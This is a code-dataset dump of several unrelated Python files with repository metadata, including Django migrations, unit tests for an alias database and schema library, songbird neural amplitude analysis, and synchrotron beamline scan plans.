migrations.AddField(
model_name='commequivalents',
name='property',
field=models.ForeignKey(db_column='property_ID', blank=True, to='ringapp.CommProperty', null=True, on_delete=models.CASCADE),
preserve_default=True,
),
migrations.AddField(
model_name='citation',
name='publication',
field=models.ForeignKey(to='ringapp.Publication', on_delete=models.CASCADE),
preserve_default=True,
),
]
| 45.761062
| 149
| 0.540901
| 974
| 10,342
| 5.592402
| 0.117043
| 0.118414
| 0.142097
| 0.189462
| 0.86029
| 0.834955
| 0.805948
| 0.737837
| 0.716174
| 0.694878
| 0
| 0.017603
| 0.313382
| 10,342
| 225
| 150
| 45.964444
| 0.749472
| 0.002031
| 0
| 0.666667
| 0
| 0
| 0.117259
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009132
| 0
| 0.022831
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf81306c1b10890f5af6b1a82b7dc47dbe3a709c
| 258
|
py
|
Python
|
python/testData/inspections/PyAugmentAssignmentInspection/numeric.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyAugmentAssignmentInspection/numeric.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyAugmentAssignmentInspection/numeric.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | null | null | null |
var_3 = var_3
var_4 = 1
<weak_warning descr="Assignment can be replaced with an augmented assignment">var_6 = var_6 + var_4</weak_warning>
#PY-2482
<weak_warning descr="Assignment can be replaced with an augmented assignment">var = 2 + var</weak_warning>
| 28.666667
| 114
| 0.767442
| 44
| 258
| 4.272727
| 0.409091
| 0.234043
| 0.074468
| 0.276596
| 0.712766
| 0.712766
| 0.712766
| 0.712766
| 0.712766
| 0.712766
| 0
| 0.054054
| 0.139535
| 258
| 8
| 115
| 32.25
| 0.792793
| 0.027132
| 0
| 0
| 0
| 0
| 0.443548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d8ac1c9254b67c67a915b84c21919691ace2aa42
| 4,132
|
py
|
Python
|
tests/test_alias.py
|
gnutix/taxi
|
3abad480bbc07a0ac1c47c16ee0989227234505b
|
[
"WTFPL"
] | 17
|
2016-02-02T14:10:49.000Z
|
2021-11-30T00:04:29.000Z
|
tests/test_alias.py
|
gnutix/taxi
|
3abad480bbc07a0ac1c47c16ee0989227234505b
|
[
"WTFPL"
] | 70
|
2015-01-08T17:02:42.000Z
|
2021-09-21T20:08:07.000Z
|
tests/test_alias.py
|
gnutix/taxi
|
3abad480bbc07a0ac1c47c16ee0989227234505b
|
[
"WTFPL"
] | 8
|
2015-08-23T12:50:36.000Z
|
2021-11-26T10:33:45.000Z
|
from taxi.aliases import AliasesDatabase, Mapping
def test_alias_in():
db = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
assert 'foo' in db
def test_alias_not_in():
db = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
assert 'bar' not in db
def test_alias_iter():
db = AliasesDatabase({
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
})
alias_set = set(db)
assert alias_set == set(['foo', 'bar'])
def test_alias_update_item():
db = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
db['foo'] = Mapping(mapping=(2, 2), backend='test')
assert db['foo'].mapping == (2, 2)
def test_alias_add_item():
db = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
db['bar'] = Mapping(mapping=(2, 2), backend='test')
assert db['foo'].mapping == (1, 2)
assert db['bar'].mapping == (2, 2)
def test_alias_iteritems():
db = AliasesDatabase({
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
})
alias_set = set(db.iteritems())
assert alias_set == set([
('foo', Mapping(mapping=(1, 2), backend='test')),
('bar', Mapping(mapping=(1, 3), backend='test')),
])
def test_keys():
db = AliasesDatabase({
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
})
assert set(db.keys()) == set(['foo', 'bar'])
def test_update():
db = AliasesDatabase({
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
})
db.update({
'foo': Mapping(mapping=(2, 2), backend='test'),
'baz': Mapping(mapping=(9, 9), backend='test'),
})
assert set(db.iteritems()) == set([
('foo', Mapping(mapping=(2, 2), backend='test')),
('bar', Mapping(mapping=(1, 3), backend='test')),
('baz', Mapping(mapping=(9, 9), backend='test')),
])
def test_reset():
db = AliasesDatabase({'foo': Mapping(mapping=(1, 2), backend='test')})
db.reset()
assert 'foo' not in db
def test_get_reversed_aliases():
db = AliasesDatabase({
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
})
reversed_aliases = db.get_reversed_aliases().items()
assert set(reversed_aliases) == set([
(Mapping(mapping=(1, 2), backend='test'), 'foo'),
(Mapping(mapping=(1, 3), backend='test'), 'bar'),
])
def test_filter_from_mapping_partial():
db = AliasesDatabase({
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
'baz': Mapping(mapping=(2, 3), backend='test'),
})
assert db.filter_from_mapping((1, None)) == {
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
}
def test_filter_from_mapping():
db = AliasesDatabase({
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
'baz': Mapping(mapping=(2, 3), backend='test'),
})
assert db.filter_from_mapping((1, 3)) == {
'bar': Mapping(mapping=(1, 3), backend='test')
}
def test_filter_from_mapping_empty_search():
aliases = {
'foo': Mapping(mapping=(1, 2), backend='test'),
'bar': Mapping(mapping=(1, 3), backend='test'),
'baz': Mapping(mapping=(2, 3), backend='test'),
}
db = AliasesDatabase(aliases)
assert db.filter_from_mapping(None) == aliases
def test_filter_from_alias():
aliases = {
'foo': Mapping(mapping=(1, 2), backend='test'),
'foobar': Mapping(mapping=(1, 3), backend='test'),
'baz': Mapping(mapping=(2, 3), backend='test'),
}
db = AliasesDatabase(aliases)
assert db.filter_from_alias('foo') == {
'foo': Mapping(mapping=(1, 2), backend='test'),
'foobar': Mapping(mapping=(1, 3), backend='test'),
}
| 28.895105
| 74
| 0.573814
| 511
| 4,132
| 4.53816
| 0.074364
| 0.259595
| 0.213454
| 0.139715
| 0.857266
| 0.786115
| 0.747736
| 0.730487
| 0.72445
| 0.701164
| 0
| 0.029276
| 0.214666
| 4,132
| 142
| 75
| 29.098592
| 0.685362
| 0
| 0
| 0.52381
| 0
| 0
| 0.082285
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.133333
| false
| 0
| 0.009524
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2b01552170c4815514c2a75e9ab3b7ce27672325
| 13,600
|
py
|
Python
|
src/analysis/bout_amplitude_analysis.py
|
Darilbii/Songbird_LFP_Paper
|
20131134353ffc4702eed490fcc3fefec9b08e32
|
[
"MIT"
] | null | null | null |
src/analysis/bout_amplitude_analysis.py
|
Darilbii/Songbird_LFP_Paper
|
20131134353ffc4702eed490fcc3fefec9b08e32
|
[
"MIT"
] | null | null | null |
src/analysis/bout_amplitude_analysis.py
|
Darilbii/Songbird_LFP_Paper
|
20131134353ffc4702eed490fcc3fefec9b08e32
|
[
"MIT"
] | null | null | null |
import numpy as np
import BirdSongToolbox.free_epoch_tools as fet
from BirdSongToolbox.import_data import ImportData
from BirdSongToolbox.file_utility_functions import _save_numpy_data, _load_numpy_data
import src.analysis.hilbert_based_pipeline as hbp
# from src.analysis.chunk_when_analysis_naive import save_pandas_to_pickle
from src.analysis.context_utility import birds_context_obj, all_last_syllable
from src.analysis.ml_pipeline_utilities import all_bad_channels
from BirdSongToolbox.context_hand_labeling import label_focus_context, first_context_func, last_context_func
bout_amplitude_analysis_path = '/home/debrown/bout_amplitude_analysis'
def get_bout_amplitude_analysis_results(bird_id='z007', session='day-2016-09-09'):
# Save the Before: Low Freq
bout_amplitude_analysis_before_low =_load_numpy_data(data_name="bout_amplitude_analysis_before_low",
bird_id=bird_id, session=session, source=bout_amplitude_analysis_path, verbose=True)
# Save the Before: High Freq
bout_amplitude_analysis_before_high = _load_numpy_data(data_name="bout_amplitude_analysis_before_high",
bird_id=bird_id, session=session, source=bout_amplitude_analysis_path, verbose=True)
# Save the After: High Freq
bout_amplitude_analysis_after_high = _load_numpy_data(data_name="bout_amplitude_analysis_after_high",
bird_id=bird_id, session=session, source=bout_amplitude_analysis_path, verbose=True)
# Save the After: Low Freq
bout_amplitude_analysis_after_low = _load_numpy_data(data_name="bout_amplitude_analysis_after_low", bird_id=bird_id,
session=session, source=bout_amplitude_analysis_path, verbose=True)
return bout_amplitude_analysis_before_low, bout_amplitude_analysis_before_high, bout_amplitude_analysis_after_high,\
bout_amplitude_analysis_after_low
def run_bout_amplitude_analysis(bird_id='z007', session='day-2016-09-09'):
zdata = ImportData(bird_id=bird_id, session=session)
# Format Hanlabels for use
chunk_labels_list, chunk_onsets_list = fet.get_chunk_handlabels(handlabels_list=zdata.song_handlabels)
# Switch to the Log Spaced Bins
freq_bins = 100
fc_lo = np.logspace(np.log10(2), np.log10(220), freq_bins)
fc_hi = np.logspace(np.log10(3), np.log10(250), freq_bins)
# Get Channels to Exclude from CAR
bad_channels = all_bad_channels[bird_id]
proc_data2 = hbp.feature_extraction_chunk(neural_chunks=zdata.song_neural,
fs=1000,
l_freqs=fc_lo,
h_freqs=fc_hi,
hilbert="amplitude",
z_score=True,
mv_avg=100,
bad_channels=bad_channels,
verbose=True)
# Get Starts of Events of Interest (Syllables)
testclass = birds_context_obj(bird_id=bird_id)
# Get the Context Array for the Day’s Data
test_context = testclass.get_all_context_index_arrays(chunk_labels_list)
# Select Labels Using Flexible Context Selection
first_syll = label_focus_context(focus=1,
labels=chunk_labels_list,
starts=chunk_onsets_list[0],
contexts=test_context,
context_func=first_context_func)
last_syll = label_focus_context(focus=all_last_syllable[bird_id],
labels=chunk_labels_list,
starts=chunk_onsets_list[1],
contexts=test_context,
context_func=last_context_func)
# Set the Context Windows
first_window = (-100, 200)
last_window = (-100, 200)
# Clip around Events of Interest
all_firsts = fet.get_event_related_nd_chunk(chunk_data=proc_data2, chunk_indices=first_syll,
fs=1000, window=first_window)
all_lasts = fet.get_event_related_nd_chunk(chunk_data=proc_data2, chunk_indices=last_syll,
fs=1000, window=last_window)
# Correct The Shape of the Data
all_firsts = fet.event_shape_correction(all_firsts, original_dim=3)
all_lasts = fet.event_shape_correction(all_lasts, original_dim=3)
# Make them ndarray indexable
all_firsts = np.asarray(all_firsts)
all_lasts = np.asarray(all_lasts)
# Before Bout Amplitude Change
diff_amplitude_before = all_firsts[:, :, :, 100] - all_firsts[:, :, :, 200]
diff_amplitude_before = np.delete(diff_amplitude_before, bad_channels, axis=2) # Remove Bad Channels
## Break Between Above and Below 50 Hz
diff_amplitude_before_low_freq = diff_amplitude_before[:, :65, :]
diff_amplitude_before_high_freq = diff_amplitude_before[:, 65:, :]
# Reshape Arrays (Instances, Features)
diff_amplitude_before_low_freq = np.reshape(diff_amplitude_before_low_freq, (len(diff_amplitude_before), -1))
diff_amplitude_before_high_freq = np.reshape(diff_amplitude_before_high_freq, (len(diff_amplitude_before), -1))
# After Bout Amplitude Change
diff_amplitude_after = all_lasts[:, :, :, 100] - all_lasts[:, :, :, 200]
diff_amplitude_after = np.delete(diff_amplitude_after, bad_channels, axis=2) # Remove Bad Channels
diff_amplitude_after_high_freq = diff_amplitude_after[:, :65, :]
diff_amplitude_after_low_freq = diff_amplitude_after[:, 65:, :]
# Reshape Arrays (Instances, Features)
diff_amplitude_after_high_freq = np.reshape(diff_amplitude_after_high_freq, (len(diff_amplitude_after), -1))
diff_amplitude_after_low_freq = np.reshape(diff_amplitude_after_low_freq, (len(diff_amplitude_after), -1))
# Save the Before: Low Freq
_save_numpy_data(data=diff_amplitude_before_low_freq, data_name="bout_amplitude_analysis_before_low",
bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
verbose=True)
# Save the Before: High Freq
_save_numpy_data(data=diff_amplitude_before_high_freq, data_name="bout_amplitude_analysis_before_high",
bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
verbose=True)
# Save the After: High Freq
_save_numpy_data(data=diff_amplitude_after_high_freq, data_name="bout_amplitude_analysis_after_high",
bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
verbose=True)
# Save the After: Low Freq
_save_numpy_data(data=diff_amplitude_after_low_freq, data_name="bout_amplitude_analysis_after_low", bird_id=bird_id,
session=session, destination=bout_amplitude_analysis_path, make_parents=True, verbose=True)
def get_bout_amplitude_analysis_results2(bird_id='z007', session='day-2016-09-09'):
# Save the Before: Low Freq
bout_amplitude_analysis_before_low =_load_numpy_data(data_name="bout_amplitude_analysis_before_low2",
bird_id=bird_id, session=session, source=bout_amplitude_analysis_path, verbose=True)
# Save the Before: High Freq
bout_amplitude_analysis_before_high = _load_numpy_data(data_name="bout_amplitude_analysis_before_high2",
bird_id=bird_id, session=session, source=bout_amplitude_analysis_path, verbose=True)
# Save the After: High Freq
bout_amplitude_analysis_after_high = _load_numpy_data(data_name="bout_amplitude_analysis_after_high2",
bird_id=bird_id, session=session, source=bout_amplitude_analysis_path, verbose=True)
# Save the After: Low Freq
bout_amplitude_analysis_after_low = _load_numpy_data(data_name="bout_amplitude_analysis_after_low2", bird_id=bird_id,
session=session, source=bout_amplitude_analysis_path, verbose=True)
return bout_amplitude_analysis_before_low, bout_amplitude_analysis_before_high, bout_amplitude_analysis_after_high,\
bout_amplitude_analysis_after_low
def run_bout_amplitude_analysis2(bird_id='z007', session='day-2016-09-09'):
zdata = ImportData(bird_id=bird_id, session=session)
# Format Hanlabels for use
chunk_labels_list, chunk_onsets_list = fet.get_chunk_handlabels(handlabels_list=zdata.song_handlabels)
# Switch to the Log Spaced Bins
freq_bins = 100
fc_lo = np.logspace(np.log10(2), np.log10(220), freq_bins)
fc_hi = np.logspace(np.log10(3), np.log10(250), freq_bins)
# Get Channels to Exclude from CAR
bad_channels = all_bad_channels[bird_id]
proc_data2 = hbp.feature_extraction_chunk(neural_chunks=zdata.song_neural,
fs=1000,
l_freqs=fc_lo,
h_freqs=fc_hi,
hilbert="amplitude",
z_score=True,
mv_avg=50,
bad_channels=bad_channels,
verbose=True)
# Get Starts of Events of Interest (Syllables)
testclass = birds_context_obj(bird_id=bird_id)
# Get the Context Array for the Day’s Data
test_context = testclass.get_all_context_index_arrays(chunk_labels_list)
# Select Labels Using Flexible Context Selection
first_syll = label_focus_context(focus=1,
labels=chunk_labels_list,
starts=chunk_onsets_list[0],
contexts=test_context,
context_func=first_context_func)
last_syll = label_focus_context(focus=all_last_syllable[bird_id],
labels=chunk_labels_list,
starts=chunk_onsets_list[1],
contexts=test_context,
context_func=last_context_func)
# Set the Context Windows
first_window = (-50, 100)
last_window = (-50, 100)
# Clip around Events of Interest
all_firsts = fet.get_event_related_nd_chunk(chunk_data=proc_data2, chunk_indices=first_syll,
fs=1000, window=first_window)
all_lasts = fet.get_event_related_nd_chunk(chunk_data=proc_data2, chunk_indices=last_syll,
fs=1000, window=last_window)
# Correct The Shape of the Data
all_firsts = fet.event_shape_correction(all_firsts, original_dim=3)
all_lasts = fet.event_shape_correction(all_lasts, original_dim=3)
# Make them ndarray indexable
all_firsts = np.asarray(all_firsts)
all_lasts = np.asarray(all_lasts)
# Before Bout Amplitude Change
diff_amplitude_before = all_firsts[:, :, :, 50] - all_firsts[:, :, :, 100]
diff_amplitude_before = np.delete(diff_amplitude_before, bad_channels, axis=2) # Remove Bad Channels
## Break Between Above and Below 50 Hz
diff_amplitude_before_low_freq = diff_amplitude_before[:, :65, :]
diff_amplitude_before_high_freq = diff_amplitude_before[:, 65:, :]
# Reshape Arrays (Instances, Features)
diff_amplitude_before_low_freq = np.reshape(diff_amplitude_before_low_freq, (len(diff_amplitude_before), -1))
diff_amplitude_before_high_freq = np.reshape(diff_amplitude_before_high_freq, (len(diff_amplitude_before), -1))
# After Bout Amplitude Change
diff_amplitude_after = all_lasts[:, :, :, 50] - all_lasts[:, :, :, 100]
diff_amplitude_after = np.delete(diff_amplitude_after, bad_channels, axis=2) # Remove Bad Channels
diff_amplitude_after_high_freq = diff_amplitude_after[:, :65, :]
diff_amplitude_after_low_freq = diff_amplitude_after[:, 65:, :]
# Reshape Arrays (Instances, Features)
diff_amplitude_after_high_freq = np.reshape(diff_amplitude_after_high_freq, (len(diff_amplitude_after), -1))
diff_amplitude_after_low_freq = np.reshape(diff_amplitude_after_low_freq, (len(diff_amplitude_after), -1))
# Save the Before: Low Freq
_save_numpy_data(data=diff_amplitude_before_low_freq, data_name="bout_amplitude_analysis_before_low2",
bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
verbose=True)
# Save the Before: High Freq
_save_numpy_data(data=diff_amplitude_before_high_freq, data_name="bout_amplitude_analysis_before_high2",
bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
verbose=True)
# Save the After: High Freq
_save_numpy_data(data=diff_amplitude_after_high_freq, data_name="bout_amplitude_analysis_after_high2",
bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
verbose=True)
# Save the After: Low Freq
_save_numpy_data(data=diff_amplitude_after_low_freq, data_name="bout_amplitude_analysis_after_low2", bird_id=bird_id,
session=session, destination=bout_amplitude_analysis_path, make_parents=True, verbose=True)
| 50.746269
| 121
| 0.680294
| 1,709
| 13,600
| 4.978935
| 0.103569
| 0.091668
| 0.130803
| 0.028205
| 0.923493
| 0.914091
| 0.914091
| 0.914091
| 0.914091
| 0.914091
| 0
| 0.020819
| 0.247721
| 13,600
| 267
| 122
| 50.93633
| 0.810869
| 0.115441
| 0
| 0.745098
| 0
| 0
| 0.05672
| 0.049202
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026144
| false
| 0
| 0.065359
| 0
| 0.104575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b3776e28f5d2eaeae76c93b494ac07a9804f064
| 113
|
py
|
Python
|
data/operator/bbox/xyxy2polygon.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 143
|
2021-12-03T02:33:36.000Z
|
2022-03-29T00:01:48.000Z
|
data/operator/bbox/xyxy2polygon.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 33
|
2021-12-03T10:32:05.000Z
|
2022-03-31T02:13:55.000Z
|
data/operator/bbox/xyxy2polygon.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 24
|
2021-12-04T06:46:42.000Z
|
2022-03-30T07:57:47.000Z
|
def bbox_xyxy2polygon(bbox):
return (bbox[0], bbox[1], bbox[0], bbox[3], bbox[2], bbox[3], bbox[2], bbox[1])
| 37.666667
| 83
| 0.619469
| 21
| 113
| 3.285714
| 0.380952
| 0.144928
| 0.26087
| 0.289855
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091837
| 0.132743
| 113
| 2
| 84
| 56.5
| 0.612245
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
99205316958d8e011ce63cdadf91c53dfea3333e
| 153
|
py
|
Python
|
thanados/models/iosacal/__init__.py
|
stefaneichert/thanados
|
262b97e995425ddfe49dae0089f7de6ca58842e7
|
[
"MIT"
] | 15
|
2019-11-15T15:54:52.000Z
|
2022-01-27T10:51:18.000Z
|
thanados/models/iosacal/__init__.py
|
nhmvienna/thanados
|
262b97e995425ddfe49dae0089f7de6ca58842e7
|
[
"MIT"
] | 1
|
2022-01-05T09:38:58.000Z
|
2022-03-08T11:10:02.000Z
|
thanados/models/iosacal/__init__.py
|
nhmvienna/thanados
|
262b97e995425ddfe49dae0089f7de6ca58842e7
|
[
"MIT"
] | 5
|
2019-11-21T14:46:12.000Z
|
2022-02-25T16:10:24.000Z
|
import thanados.models.iosacal
from thanados.models.iosacal.core import R, combine
from thanados.models.iosacal.plot import iplot
__VERSION__ = '0.4.1'
| 25.5
| 51
| 0.810458
| 23
| 153
| 5.217391
| 0.608696
| 0.35
| 0.525
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 0.098039
| 153
| 5
| 52
| 30.6
| 0.847826
| 0
| 0
| 0
| 0
| 0
| 0.03268
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
99a99357b06abff6286ce8b7c086fa2c14f09841
| 1,650
|
py
|
Python
|
tests/list/test_list_of_representation.py
|
nikitanovosibirsk/district42
|
0c13248919fc96bde16b9634a8ea468e4882752a
|
[
"Apache-2.0"
] | 1
|
2016-09-16T04:09:19.000Z
|
2016-09-16T04:09:19.000Z
|
tests/list/test_list_of_representation.py
|
nikitanovosibirsk/district42
|
0c13248919fc96bde16b9634a8ea468e4882752a
|
[
"Apache-2.0"
] | 2
|
2021-06-14T05:53:49.000Z
|
2022-02-01T14:26:31.000Z
|
tests/list/test_list_of_representation.py
|
nikitanovosibirsk/district42
|
0c13248919fc96bde16b9634a8ea468e4882752a
|
[
"Apache-2.0"
] | null | null | null |
from baby_steps import given, then, when
from district42 import represent, schema
def test_list_of_representation():
with given:
sch = schema.list(schema.bool)
with when:
res = represent(sch)
with then:
assert res == "schema.list(schema.bool)"
def test_list_of_values_representation():
with given:
sch = schema.list(schema.int(1))
with when:
res = represent(sch)
with then:
assert res == "schema.list(schema.int(1))"
def test_list_of_repr_values_representation():
with given:
sch = schema.list(schema.str("banana"))
with when:
res = represent(sch)
with then:
assert res == "schema.list(schema.str('banana'))"
def test_list_of_len_representation():
with given:
sch = schema.list(schema.int).len(10)
with when:
res = represent(sch)
with then:
assert res == "schema.list(schema.int).len(10)"
def test_list_of_min_len_representation():
with given:
sch = schema.list(schema.int).len(1, ...)
with when:
res = represent(sch)
with then:
assert res == "schema.list(schema.int).len(1, ...)"
def test_list_of_max_len_representation():
with given:
sch = schema.list(schema.int).len(..., 10)
with when:
res = represent(sch)
with then:
assert res == "schema.list(schema.int).len(..., 10)"
def test_list_of_min_max_len_representation():
with given:
sch = schema.list(schema.int).len(1, 10)
with when:
res = represent(sch)
with then:
assert res == "schema.list(schema.int).len(1, 10)"
| 20.37037
| 60
| 0.615152
| 220
| 1,650
| 4.463636
| 0.136364
| 0.142566
| 0.228106
| 0.193483
| 0.879837
| 0.834012
| 0.834012
| 0.789206
| 0.688391
| 0.688391
| 0
| 0.016313
| 0.25697
| 1,650
| 80
| 61
| 20.625
| 0.784666
| 0
| 0
| 0.54902
| 0
| 0
| 0.136364
| 0.124848
| 0
| 0
| 0
| 0
| 0.137255
| 1
| 0.137255
| false
| 0
| 0.039216
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41deb224012263f22de46bee131a15d48d38fa8f
| 32,116
|
py
|
Python
|
startup/users/30-user-Gomez.py
|
mrakitin/profile_collection-smi
|
1eea45a3b886b2c0daeec715ce94f27da24d0ba3
|
[
"BSD-3-Clause"
] | null | null | null |
startup/users/30-user-Gomez.py
|
mrakitin/profile_collection-smi
|
1eea45a3b886b2c0daeec715ce94f27da24d0ba3
|
[
"BSD-3-Clause"
] | 13
|
2018-09-25T19:35:08.000Z
|
2021-01-15T20:42:26.000Z
|
startup/users/30-user-Gomez.py
|
mrakitin/profile_collection-smi
|
1eea45a3b886b2c0daeec715ce94f27da24d0ba3
|
[
"BSD-3-Clause"
] | 3
|
2019-09-06T01:40:59.000Z
|
2020-07-01T20:27:39.000Z
|
def ex_situ_hardxray(t=1):
# samples = ['PLA2','PLA1','CON6','CON5', 'CON4','CON3','CON2','CON1',
# '05_Ca_1', '05_Ca_2', '05_UT_1', '05_UT_2', 'PLA6','PLA4','PLA3',
# ]
# samples = ['B5_1','B5_2','B5_3', 'B6_1','B6_2','B6_3','B7_1','B7_2','B7_3','B12_1','B12_2','B12_3']
# x_list = [45550, 41200, 35600, 25600, 20900, 15400, -1900, -7900, -14000, -24100, -28200, -32700, ]
# y_list = [-9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300]
# samples = ['A1_1','A1_2','A1_3', 'A1_4','A2_5','A2_6','A2_7','A2_8','A3_9','A3_10','A3_11','A3_12','A3_13','A3_14','A4_15', 'A4_16', 'A4_17', 'A4_19']
# x_list = [45950, 43250, 37250, 31650, 24400, 18850, 12500, 8000, -3400, -7300, -11300, -16800, -20900, -26400, -33000, -37400, -41900, -45200]
# y_list = [3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500]
# samples = ['C8_32', 'C8_33', 'C8_34', 'C8_35', 'C9_36', 'C9_37', 'C9_38', 'C9_39', 'C10_40', 'C10_41', 'C10_42', 'C10_43',
# 'C10_44', 'C10_45', 'C11_46', 'C11_47', 'C11_48', 'C11_49', 'C11_50']
# x_list = [43700, 38300, 34000, 27800, 20900, 16200, 12100, 7100, -2700, -6700, -10500, -15700, -20000,
# -24200, -29300, -32700, -36700, -41000, -45000]
# y_list = [3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700,
# 3700, 3700, 3700, 3700, 3700, 3700]
samples = ['D13_51','D13_52','D13_53','D14_54','D14_55','D14_56','D15_57','D15_58','D15_59','D16_60','D16_61','D16_62','D16_63','D16_64',
'D17_65','D17_66','D17_67']
x_list = [43700, 38400, 34000, 25200, 20000, 15400, 6700, 2500, -2300, -6800, -14000, -19000, -23300, -28500,
-34700, -39300, -43600]
y_list = [-9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880,
-9880, -9880, -9880]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(13, 0, 3)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y in zip(samples, x_list, y_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
name_fmt = '{sam}_wa{waxs}'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
def NEXAFS_Fe_edge(t=0.5, name='sample1'):
dets = [pil300KW]
#name = 'Kapton_NEXAFS_1_gvopen_wa70_'
#x = [8800]
energies = np.linspace(7100, 7150, 51)
#for name, x in zip(names, x):
#bps.mv(piezo.x, x)
det_exposure_time(t,t)
